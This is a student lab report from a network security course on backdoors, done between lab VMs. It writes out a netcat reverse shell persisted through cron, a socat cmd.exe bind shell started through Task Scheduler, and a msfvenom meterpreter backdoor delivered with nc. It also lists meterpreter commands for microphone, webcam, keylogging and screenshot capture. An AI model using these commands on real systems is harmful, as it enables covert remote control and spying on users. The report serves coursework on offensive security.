2017-2018-2 20155319『网络对抗技术』Exp2:后门原理与实践

1.实验准备

一、实验说明

任务一:使用netcat获取主机操作Shell,cron启动 (0.5分)

任务二:使用socat获取主机操作Shell, 任务计划启动 (0.5分)

任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分)

任务四:使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分)

二、问题回答

  • 问:例举你能想到的一个后门进入到你系统中的可能方式?
  • 在下载东西时候没有从官方网站,有捆绑软件或后门
  • 问:例举你知道的后门如何启动起来(win及linux)的方式?
  • win:修改注册表、引诱我们点击从而执行

    lunix:绑定注入shellcode开启后门
  • 问:Meterpreter有哪些给你映像深刻的功能?
  • 远程控制摄像头、键击等用户关键信息

实验过程记录

任务一:Windows获得Linux Shell

  1. 在Windows下使用ipconfig查看本机IP:

  2. 使用ncat.exe程序监听本机的5319端口

  3. 在Kali环境下,使用nc指令的-e选项反向连接Windows主机的5319端口

  4. 成功获得Kali的shell,如下图所示:

任务二:Linux获得Windows Shell

1. 在Kali环境中使用ifconfig查看IP
2. 使用nc指令监听`5319`端口
3. 在Windows下,使用ncat.exe程序的-e选项项反向连接Kali主机的`5319`端口
4. Kali下可以看到Windows的命令提示,可以输入Windows命令:

任务三:使用nc传输数据

1. Windows下监听5319端口:
2. Kali下连接到Windows的5319端口:
3. 传输数据:

3. Meterpreter

任务一:使用netcat获取主机操作Shell,cron启动

  1. 在Windows系统下,监听5319端口

  2. crontab -e指令编辑一条定时任务,选择第三个选项:

  3. 在最后一行添加48 * * * * /bin/netcat 192.168.3.103 5319 -e /bin/sh,意思是在每个小时的第48分钟反向连接Windows主机的5319端口:(注意是虚拟机的时间):

  4. 当时间到了,此时已经获得了Kali的shell,可以输入指令:

任务二:使用socat获取主机操作Shell, 任务计划启动

相关知识:

  • socat是ncat的增强版,它使用的格式是socat [options]
    ,其中两个address是必选项,而options 是可选项。
  • socat的基本功能就是建立两个双向的字节流,数据就在其间传输,参数address就是代表了其中的一个方向。所谓流,代表了数据的流向,而数据则可以有许多不同的类型,命令中也就相应需要许多选项对各种不同的类型数据流进行限定与说明。

实验过程

1.Windows+X,然后选择“控制面板”(win8下打开控制面板)

2.右上角“查看方式”选择“大图标”

3.点击管理程序->点击任务计划程序

4.选择上方菜单栏中的“操作”->“创建任务”

5.输入任务名

6.新建触发器,在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:5319 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口5319,同时把cmd.exe的stderr重定向到stdout上

7.创建完成之后,按Windows+L快捷键锁定计算机,再次打开时,可以发现之前创建的任务已经开始运行

8.socat - tcp:192.168.3.103:5319,这里的第一个参数-代表标准的输入输出,第二个流连接到Windows主机的5319端口,此时可以发现已经成功获得了一个cmd shell:(此处的IP地址为WindowsIP)



任务三、使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

1.在Kali上执行指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.50.132 LPORT=5319 -f exe > backdoor.exe,注意这里的IP地址为控制端IP,即LinuxIP,可见已经生成了后门程序“backdoor.exe”

2.在Windows下执行ncat.exe -l 5319 > 20155312_backdoor.exe,这样被控主机就进入了接收文件模式

3.在Linux中执行nc 192.168.50.132 5319 < backdoor.exe,注意这里的IP为被控主机IP,即WindowsIP

4.传送接收文件成功,如下图所示:

5.在Kali中打开一个终端,使用msfconsole指令进入msf控制台

6.接着输入use exploit/multi/handler使用监听模块,设置payload

7.set payload windows/meterpreter/reverse_tcp,使用和生成后门程序时相同的payload

8.set LHOST 192.168.50.132,这里用的是LinuxIP,和生成后门程序时指定的IP相同

9.set LPORT 5319,同样要使用相同的端口

10.关闭所有杀毒软件,并开始监听

四、使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

- 使用record_mic指令可以截获一段音频:(可以+“-d 时间”来设定录制时间)
- 使用webcam_snap指令可以使用摄像头进行拍照
- 使用keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录
- 使用screenshot指令可以进行截屏

拍照后用ncat把图片传到电脑

实验中遇到的问题

1.在设置每多少分钟启动时是虚拟机的时间,不是电脑本身的时间:

2.msfconsole启动的时候出现问题:

百度了答案:是因为kali2.0的取消了metasploit的数据库

https://www.cnblogs.com/Hi-blog/p/6795811.html

# 2017-2018-2 20155319『网络对抗技术』Exp2:后门原理与实践的更多相关文章

  1. 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...

  2. 2018-2019-2 《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 <网络对抗技术>Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 (0. ...

  3. 2018-2019-2 网络对抗技术 20165318 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165318 Exp2 后门原理与实践 后门的基本概念及基础问题回答 常用后门工具 netcat Win获得Linux Shell Linux获得Win Sh ...

  4. 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...

  5. 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...

  6. 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践

    - 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践 - 实验任务 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主 ...

  7. 2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践 一.实验要求 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用soc ...

  8. 2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165235<网络对抗技术>Exp2 后门原理与实践 实验内容 1.使用netcat获取主机操作Shell,cron启动 2.使用socat获取主机操作Shel ...

  9. 2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践 后门的基本概念 常用后门工具 netcat Win获得Linux Shell Linux获得Win Shell Met ...

随机推荐

  1. tomcat报错this web application instance has been stopped already问题

    上网搜了下,大部分的报错原因:重启时候 之前的tomcat未正常关闭 ,导致在重启时候 报了这个问题.mac下解决: ps -ef|grep tomcat 找到在进行的tomcat ,kill -9  ...

  2. SQL Server数据库中外键强制约束的好处是什么,什么时候设置外键非强制约束?(转载)

    Sql Server: What is the benefit of using “Enforce foreign key constraint” when it's set to “NO”? 问 I ...

  3. Android图形显示之硬件抽象层Gralloc【转】

    https://blog.csdn.net/yangwen123/article/details/12192401 FrameBuffer驱动程序分析文中介绍了Linux系统下的显示驱动框架,每个显示 ...

  4. 将目录结构输出为json格式(zTree)

    # -*- coding: UTF-8 -*- import json,os path = 'E:\\BACKUP' #返回空目录 def path_to_dict(path): d = {'name ...

  5. 大数据开发实战:HDFS和MapReduce优缺点分析

    一. HDFS和MapReduce优缺点 1.HDFS的优势 HDFS的英文全称是 Hadoop Distributed File System,即Hadoop分布式文件系统,它是Hadoop的核心子 ...

  6. Windows:服务已经标记为删除

    解决办法: 方法一:运行删除服务项命令的时候,服务管理窗口未关闭,关闭服务管理窗口即可: 方法二:删除服务的注册表项,路径为: HKEY_LOCAL_MACHINE\SYSTEM\CurrentCon ...

  7. 在servlet中用spring @Autowire注入Bean

    在servlet中新增init方法: public void init(ServletConfig config) { super.init(config); SpringBeanAutowiring ...

  8. MSChart 设置饼图颜色 图例背景色 图例显示位置

    chartField.Series.Clear();            chartField.ChartAreas.Clear();            chartField.Legends.C ...

  9. maven的下载与安装

    下载路径:http://maven.apache.org/download.cgi 选择打红线的进行下载,我用的版本是3.3.9, 下载后解压该文件,解压后的文件内容如下: 解压完成后配置maven的 ...

  10. 【adb命令】在cmd窗口中使用adb install命令安装 中文名字apk报错的解决办法

    1.在cmd窗口中使用adb install命令安装中文名字apk报错,安装英文名字apk就正常,详细报错如下图: 2.查看adb版本号:adb version 3.怀疑是adb版本的原因,尝试换个最 ...